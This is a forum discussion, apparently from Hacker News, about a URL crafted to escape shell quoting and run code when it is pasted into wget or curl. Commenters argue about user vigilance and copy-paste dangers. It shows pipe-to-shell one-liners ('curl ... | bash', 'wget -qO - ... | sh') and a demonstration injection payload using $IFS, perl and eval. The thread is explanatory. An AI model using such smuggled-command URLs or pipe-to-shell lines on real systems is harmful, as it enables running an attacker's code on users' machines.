URL is also a shell script that executes some malicious(?) code
github.com
github.com
i noticed the single quote. know how it gets escaped from the quote. the point is : we that work on command line use single quote to enclose urls as parameter to curl/wget. and that's not safe if you don't char-by-char escape the url.
Anyway, shells are dumb and dangerous. A real interactive language should simply have a text box for text. I guess I could write a usual 10 paragraph rant on this but it really is that simple.
1. Day of the seal soon.
There is literally no way to secure against people being hacked if the scenario is a user blindly following instructions without looking at / thinking about them.
> tell me the specific way you check your stuff before pasting so I can tell you how it's either broken or you're the 0.001% user and nobody else does that.
I'm no 0.001% user, I'm not a shell expert and I can't catch everything but in the context of this particular post:
- I know how string quoting in programming languages broadly works (no need to know if ' or " escapes or not - just know that if there's any quotes inside the string it deserves a closer look)
- I know that $ in bash (& some other languages) precedes something dynamic (maybe variable substitution, maybe inline code, no need to know about stuff in any detail, just enough to be suspicious)
- I know pipe chars in shells generally separate commands (no need to understand io redirection in any detail here)
- I know that URLs tend to follow boring conventions - if it's not domain/alphanum/alphanum?alphanum=etc then it's suspect and needs further attention (URLs can contain many weird chars but normal ones tend not to).
The above bullets are pretty basic imo - you don't need to be a bash wizard to grok that much. If you know these, you'd never run the one-liner shown in the OP.
Extra:
- if it's a one-liner crossing scroll boundaries, that's too long (excepting very long URLs maybe if they're super-simple)
As a counter-example, here's the type of stuff most people copypaste into shells all the time:
curl http://example.com/simple/path | bash
That's interesting here for two reasons:1. as an inline threat, it's clearly harmless - the URL has no unusual special chars or $ and the command is very short - it can be read & grokked at a glance.
2. as a general threat, this is very dangerous because (a) it's unencryped/MITM-able and (b) you may or may not trust the hosted script being downloaded and eval-ed on your machine.
My overall point here is: there's plenty of valid & dangerous social engineering threats in your terminal; plainly obvious inline quoting problems ain't it.
- the copy-replace trick is harder to do if you use native copy (keyboard or mouse menu) & avoid "Copy" icons pages provide
- if it's such a long snippet that's too long to re-verify at a glance, maybe it's too long...
Pretty sure that's not true. CSS allows you to choose both what's visible to the user, and also what's included in copy/paste. There's _some_ limitations on that, but it's flexible enough to have a lot of room to be extremely scary.
You can also have a lot of fun with fonts, something that looks like "cp a b" could actually, in text, be "rm a b"
> harder to do
You can do it via CSS trickery, or you can even do keyboard/mouse event detection and swap out via window.getSelection(), but both are much more involved & less reliable than via a button.
1. there is some validation that checks if a URL is valid
2. this check can be bypassed with this pattern to execute code
Shows that "right click, copy link, type wget ', paste, type ', enter" is a receipe to get pwned.
Same is probably true even when you do not paste it into a terminal but into a script. Like "Ok, I'm gonna automate downloading this ..."
If you’re lucky it works. If you’re somewhat less lucky but still on the positive side, it doesn’t work with some syntax error that doesn’t corrupt anything.
There’s no excuse for not reviewing what is being executed before actually running it.
wget -i ./urlsThe real risk of this sort of thing is basically Bash injection - people who have bash scripts as part of their infrastructure that process public data. Sounds insane, yes. But there's a scary number of people who think Bash scripting is a sane thing to do.
Wouldn't
wget -qO - www.example.com/script | sh
catch far more of the uninitiated?Now this example wasn't exactly well camouflaged, but I'd not be surprised if you can make it much more innocent looking.
This happens often enough, there's an entry in youtube-dl FAQ about it:
https://github.com/ytdl-org/youtube-dl#video-url-contains-an...
(They advice to add single quotes around the URL, which as you now know, is not necessarily sufficient.)
1. Your epistemic reasoning capabilities are broken (as in, why do you think people should know better?)
2. You are just adopting an ad-hoc philosophy based on how shells work. If interactive languages had separate text inputs instead of just parsing a stream of text from stdin, pasting would always be safe. One may be tempted to call this "UN*X braindamage".
3. You appear to possibly believe in checking a URL before opening it type voodoo as well, regardless of shell issues
A separate text input is just stdin by another name.
Yes, I believe people who paste URLs into the terminal should examine those URLs - you generally have to trim some stuff, quote, or rewrite things to make them useful. If you believe in wildly flinging data everywhere, good on you, I'd rather deal with easily avoidable problems such as demonstrated in TFA.
That would be an effective argument, but this vile shit has existed for decades without being fixed, for no good reason. This saw is specifically designed to slice fingers off, rather than do useful work, for no reason.
> Having a base level expectation of competence for operators is normal.
UNIX expects perfection, while providing none of its own.
> A separate text input is just stdin by another name.
No, nitwit, it prevents in-band signalling, which is the entire problem here.
Anyway, I use Emacs for everything, and don't have these issues. With wget, I use -i - to enter multiple URLs at once, but it would also defeat this.
You can't safely paste anything into the shell ever lol. For multiple reasons. It doesn't matter how much visual inspection you do.
Oh how the turntables…
url=$(cat <<'EOF'
http://example.com/;'$(gt=$(perl$IFS-E$IFS's//62/;s/62/chr/e;say');eval$IFS''cowsay$IFS''pwned$IFS$gt/dev/tty)';cowsay$IFS''pwned
EOF
)
wget "${url}"
Edit: trying to format % curl 'http://example.com/;'$(gt=$(perl$IFS-E$IFS's//62/;s/62/chr/e;say');eval$IFS''cowsay$IFS''pwned$IFS$gt/dev/tty)';cowsay$IFS''pwned'
zsh: no such file or directory: perl \t\n
zsh: no such file or directory: eval \t\n
<!doctype html>
<html>
...https://kubernetes.io/docs/tasks/tools/install-kubectl-linux...
Bash doesn't, because that would be a breaking change.